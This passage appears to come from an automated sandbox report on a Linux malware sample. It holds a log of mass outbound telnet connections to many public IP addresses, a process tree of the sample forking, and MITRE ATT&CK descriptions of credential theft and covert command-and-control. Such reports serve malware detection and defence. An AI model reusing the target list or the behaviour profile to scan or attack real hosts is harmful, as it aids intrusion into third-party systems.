Nov 10, 2021 02:55:05.705596924 CET	3667	23	192.168.2.23	108.142.239.125
Nov 10, 2021 02:55:05.705621958 CET	3667	23	192.168.2.23	52.221.20.197
Nov 10, 2021 02:55:05.705635071 CET	3667	23	192.168.2.23	64.153.50.189
Nov 10, 2021 02:55:05.705636978 CET	3667	23	192.168.2.23	160.125.42.221
Nov 10, 2021 02:55:05.705641031 CET	3667	23	192.168.2.23	19.137.13.87
Nov 10, 2021 02:55:05.705652952 CET	3667	23	192.168.2.23	52.167.216.192
Nov 10, 2021 02:55:05.705672026 CET	3667	23	192.168.2.23	203.155.45.164
Nov 10, 2021 02:55:05.705692053 CET	3667	23	192.168.2.23	185.84.233.132
Nov 10, 2021 02:55:05.705699921 CET	3667	23	192.168.2.23	168.213.221.160
Nov 10, 2021 02:55:05.705705881 CET	3667	23	192.168.2.23	60.27.55.132
Nov 10, 2021 02:55:05.705724955 CET	3667	23	192.168.2.23	74.94.245.149
Nov 10, 2021 02:55:05.705735922 CET	3667	23	192.168.2.23	130.88.41.203
Nov 10, 2021 02:55:05.705746889 CET	3667	23	192.168.2.23	121.49.236.55
Nov 10, 2021 02:55:05.705832005 CET	3667	23	192.168.2.23	98.96.220.217
Nov 10, 2021 02:55:05.705854893 CET	3667	23	192.168.2.23	212.245.199.241
Nov 10, 2021 02:55:05.705858946 CET	3667	23	192.168.2.23	133.186.57.21
Nov 10, 2021 02:55:05.705873013 CET	3667	23	192.168.2.23	2.160.129.207
Nov 10, 2021 02:55:05.705879927 CET	3667	23	192.168.2.23	14.252.187.163
Nov 10, 2021 02:55:05.705897093 CET	3667	23	192.168.2.23	191.177.43.37
Nov 10, 2021 02:55:05.705908060 CET	3667	23	192.168.2.23	211.78.181.162
Nov 10, 2021 02:55:05.705914974 CET	3667	23	192.168.2.23	143.53.240.251
Nov 10, 2021 02:55:05.705929041 CET	3667	23	192.168.2.23	163.82.235.224
Nov 10, 2021 02:55:05.705975056 CET	3667	23	192.168.2.23	211.21.31.111
Nov 10, 2021 02:55:05.705980062 CET	3667	23	192.168.2.23	133.227.103.37
Nov 10, 2021 02:55:05.706005096 CET	3667	23	192.168.2.23	117.30.51.117
Nov 10, 2021 02:55:05.706012964 CET	3667	23	192.168.2.23	135.61.84.238
Nov 10, 2021 02:55:05.706036091 CET	3667	23	192.168.2.23	46.210.212.72
Nov 10, 2021 02:55:05.706067085 CET	3667	23	192.168.2.23	158.112.199.55
Nov 10, 2021 02:55:05.706085920 CET	3667	23	192.168.2.23	72.74.191.213
Nov 10, 2021 02:55:05.706100941 CET	3667	23	192.168.2.23	197.244.132.154
Nov 10, 2021 02:55:05.706126928 CET	3667	23	192.168.2.23	218.252.243.54
Nov 10, 2021 02:55:05.706137896 CET	3667	23	192.168.2.23	155.44.215.122
Nov 10, 2021 02:55:05.706156969 CET	3667	23	192.168.2.23	186.253.174.86
Nov 10, 2021 02:55:05.706176996 CET	3667	23	192.168.2.23	31.35.68.20
Nov 10, 2021 02:55:05.706204891 CET	3667	23	192.168.2.23	179.163.93.29
Nov 10, 2021 02:55:05.706208944 CET	3667	23	192.168.2.23	185.36.128.92
Nov 10, 2021 02:55:05.706223965 CET	3667	23	192.168.2.23	85.252.4.47
Nov 10, 2021 02:55:05.706257105 CET	3667	23	192.168.2.23	51.0.2.86
Nov 10, 2021 02:55:05.706269979 CET	3667	23	192.168.2.23	180.102.7.142
Nov 10, 2021 02:55:05.706276894 CET	3667	23	192.168.2.23	209.48.38.199
Nov 10, 2021 02:55:05.706285000 CET	3667	23	192.168.2.23	166.150.228.186
Nov 10, 2021 02:55:05.706312895 CET	3667	23	192.168.2.23	113.200.174.41
Nov 10, 2021 02:55:05.706321001 CET	3667	23	192.168.2.23	206.26.82.73
Nov 10, 2021 02:55:05.706321001 CET	3667	23	192.168.2.23	216.197.93.201
Nov 10, 2021 02:55:05.706325054 CET	3667	23	192.168.2.23	71.60.239.197
Nov 10, 2021 02:55:05.706326008 CET	3667	23	192.168.2.23	45.64.70.195
Nov 10, 2021 02:55:05.706331015 CET	3667	23	192.168.2.23	166.156.11.200
Nov 10, 2021 02:55:05.706331015 CET	3667	23	192.168.2.23	132.158.182.229
Nov 10, 2021 02:55:05.706340075 CET	3667	23	192.168.2.23	152.119.134.211
Nov 10, 2021 02:55:05.706342936 CET	3667	23	192.168.2.23	41.234.30.145
Nov 10, 2021 02:55:05.706342936 CET	3667	23	192.168.2.23	145.188.124.247
Nov 10, 2021 02:55:05.706352949 CET	3667	23	192.168.2.23	39.182.47.15
Nov 10, 2021 02:55:05.706409931 CET	3667	23	192.168.2.23	210.95.139.24
Nov 10, 2021 02:55:05.706419945 CET	3667	23	192.168.2.23	67.166.40.5
Nov 10, 2021 02:55:05.706432104 CET	3667	23	192.168.2.23	98.138.58.44
Nov 10, 2021 02:55:05.706434965 CET	3667	23	192.168.2.23	173.70.189.130
Nov 10, 2021 02:55:05.706459999 CET	3667	23	192.168.2.23	103.122.1.98
Nov 10, 2021 02:55:05.706473112 CET	3667	23	192.168.2.23	139.36.33.247
Nov 10, 2021 02:55:05.706486940 CET	3667	23	192.168.2.23	102.255.143.246
Nov 10, 2021 02:55:05.706507921 CET	3667	23	192.168.2.23	73.18.20.12
Nov 10, 2021 02:55:05.706507921 CET	3667	23	192.168.2.23	140.43.4.185
Nov 10, 2021 02:55:05.706516027 CET	3667	23	192.168.2.23	207.68.119.214
Nov 10, 2021 02:55:05.706522942 CET	3667	23	192.168.2.23	40.203.231.156
Nov 10, 2021 02:55:05.706551075 CET	3667	23	192.168.2.23	5.201.147.248
Nov 10, 2021 02:55:05.706561089 CET	3667	23	192.168.2.23	134.178.147.2
Nov 10, 2021 02:55:05.706573009 CET	3667	23	192.168.2.23	190.210.255.70
Nov 10, 2021 02:55:05.706585884 CET	3667	23	192.168.2.23	82.81.89.99
Nov 10, 2021 02:55:05.706595898 CET	3667	23	192.168.2.23	137.17.172.238
Nov 10, 2021 02:55:05.706617117 CET	3667	23	192.168.2.23	102.250.67.142
Nov 10, 2021 02:55:05.706619024 CET	3667	23	192.168.2.23	103.244.169.164
Nov 10, 2021 02:55:05.706624985 CET	3667	23	192.168.2.23	91.80.217.247

HTTP Request Dependency Graph

127.0.0.1:52869

System Behavior

Analysis Process: fbXTgwatuJ PID: 5221 Parent PID: 5117

General

Start time:	02:55:04
Start date:	10/11/2021
Path:	/tmp/fbXTgwatuJ
Arguments:	/tmp/fbXTgwatuJ
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Analysis Process: fbXTgwatuJ PID: 5240 Parent PID: 5221

General

Start time:	02:55:05
Start date:	10/11/2021
Path:	/tmp/fbXTgwatuJ
Arguments:	n/a
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Analysis Process: fbXTgwatuJ PID: 5241 Parent PID: 5221

General

Start time:	02:55:05
Start date:	10/11/2021
Path:	/tmp/fbXTgwatuJ
Arguments:	n/a
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Analysis Process: fbXTgwatuJ PID: 5242 Parent PID: 5221

General

Start time:	02:55:05
Start date:	10/11/2021
Path:	/tmp/fbXTgwatuJ
Arguments:	n/a
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Analysis Process: fbXTgwatuJ PID: 5246 Parent PID: 5242

General

Start time:	02:55:05
Start date:	10/11/2021
Path:	/tmp/fbXTgwatuJ
Arguments:	n/a
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Analysis Process: fbXTgwatuJ PID: 5247 Parent PID: 5242

General

Start time:	02:55:05
Start date:	10/11/2021
Path:	/tmp/fbXTgwatuJ
Arguments:	n/a
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Analysis Process: fbXTgwatuJ PID: 5249 Parent PID: 5242

General

Start time:	02:55:05
Start date:	10/11/2021
Path:	/tmp/fbXTgwatuJ
Arguments:	n/a
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Analysis Process: fbXTgwatuJ PID: 5253 Parent PID: 5242

General

Start time:	02:55:05
Start date:	10/11/2021
Path:	/tmp/fbXTgwatuJ
Arguments:	n/a
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Analysis Process: fbXTgwatuJ PID: 5254 Parent PID: 5242

General

Start time:	02:55:05
Start date:	10/11/2021
Path:	/tmp/fbXTgwatuJ
Arguments:	n/a
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Analysis Process: systemd PID: 5273 Parent PID: 1

General

Start time:	02:55:16
Start date:	10/11/2021
Path:	/usr/lib/systemd/systemd
Arguments:	n/a
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Analysis Process: sshd PID: 5273 Parent PID: 1

General

Start time:	02:55:16
Start date:	10/11/2021
Path:	/usr/sbin/sshd
Arguments:	/usr/sbin/sshd -t
File size:	876328 bytes
MD5 hash:	dbca7a6bbf7bf57fedac243d4b2cb340

Analysis Process: systemd PID: 5274 Parent PID: 1

General

Start time:	02:55:16
Start date:	10/11/2021
Path:	/usr/lib/systemd/systemd
Arguments:	n/a
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Analysis Process: sshd PID: 5274 Parent PID: 1

General

Start time:	02:55:16
Start date:	10/11/2021
Path:	/usr/sbin/sshd
Arguments:	/usr/sbin/sshd -D
File size:	876328 bytes
MD5 hash:	dbca7a6bbf7bf57fedac243d4b2cb340

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Linux Analysis Report fbXTgwatuJ

Overview

General Information

Detection

Signatures

Classification

Analysis Advice

General Information

Process Tree

Yara Overview

PCAP (Network Traffic)

Jbx Signature Overview

AV Detection:

Networking:

System Summary:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Runtime Messages

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Network Behavior

Network Port Distribution

TCP Packets

HTTP Request Dependency Graph

System Behavior

Analysis Process: fbXTgwatuJ PID: 5221 Parent PID: 5117

General

Analysis Process: fbXTgwatuJ PID: 5240 Parent PID: 5221

General

Analysis Process: fbXTgwatuJ PID: 5241 Parent PID: 5221

General

Analysis Process: fbXTgwatuJ PID: 5242 Parent PID: 5221

General

Analysis Process: fbXTgwatuJ PID: 5246 Parent PID: 5242

General

Analysis Process: fbXTgwatuJ PID: 5247 Parent PID: 5242

General

Analysis Process: fbXTgwatuJ PID: 5249 Parent PID: 5242

General

Analysis Process: fbXTgwatuJ PID: 5253 Parent PID: 5242

General

Analysis Process: fbXTgwatuJ PID: 5254 Parent PID: 5242

General